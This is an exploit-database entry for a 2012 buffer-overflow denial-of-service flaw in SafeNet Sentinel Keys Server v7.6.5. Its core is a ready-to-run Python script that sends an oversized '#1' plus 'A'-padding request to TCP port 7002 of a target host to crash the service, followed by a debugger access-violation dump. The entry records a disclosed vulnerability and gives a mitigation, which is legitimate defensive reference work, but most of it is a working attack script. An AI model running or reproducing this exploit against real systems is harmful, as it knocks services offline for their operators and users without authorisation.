SafeNet Sentinel Keys Server DoS

vendor:

Sentinel Keys Server

by:

retset

7,8

CVSS

HIGH

Denial of Service

119

CWE

Product Name: Sentinel Keys Server

Affected Version From: v7.6.5

Affected Version To: v7.6.5

Patch Exists: YES

Related CWE: N/A

CPE: a:safenet:sentinel_keys_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2012

SafeNet Sentinel Keys Server DoS

A denial of service vulnerability exists in SafeNet Sentinel Keys Server v7.6.5 (sntlkeyssrvr.exe ver. 1.3.1.3) due to a buffer overflow when sending a specially crafted request to the server. An attacker can send a request with a large number of 'A' characters to the server, causing the application to crash.

Mitigation:

Upgrade to the latest version of SafeNet Sentinel Keys Server.

Source

Exploit-DB raw data:

# Exploit Title: SafeNet Sentinel Keys Server DoS 
# Date: 10 Sep 2012
# Exploit Author:  retset (https://twitter.com/ret5et)
# Vendor Homepage: http://www.safenet-inc.com/ 
# Version: Sentinel Protection Installer  v7.6.5 (sntlkeyssrvr.exe ver. 1.3.1.3)
# Download link: http://c3.safenet-inc.com/downloads/8/0/804F8C5F-F88F-4443-8871-2AD993DC33DB/Sentinel%20Protection%20Installer%207.6.5.exe
# Download link: http://www.safenet-inc.com/support-downloads/sentinel-drivers/ 
# Tested on: Xp Sp3

import socket
import sys

if len(sys.argv) < 2:
	print "usage: %s host"  % sys.argv[0]
	sys.exit(0)

host = sys.argv[1]
print host
req  = "#1"
req += 'A' *0x4093

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,7002))
s.send(req)
s.close()


"""
(5ec.6f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0045011c ecx=00000003 edx=00b6bf83 esi=00b70000 edi=0045011c
eip=0040f89b esp=00b65864 ebp=0000407d iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe
sntlkeyssrvr+0xf89b:
0040f89b f3a6            repe cmps byte ptr [esi],byte ptr es:[edi]
"""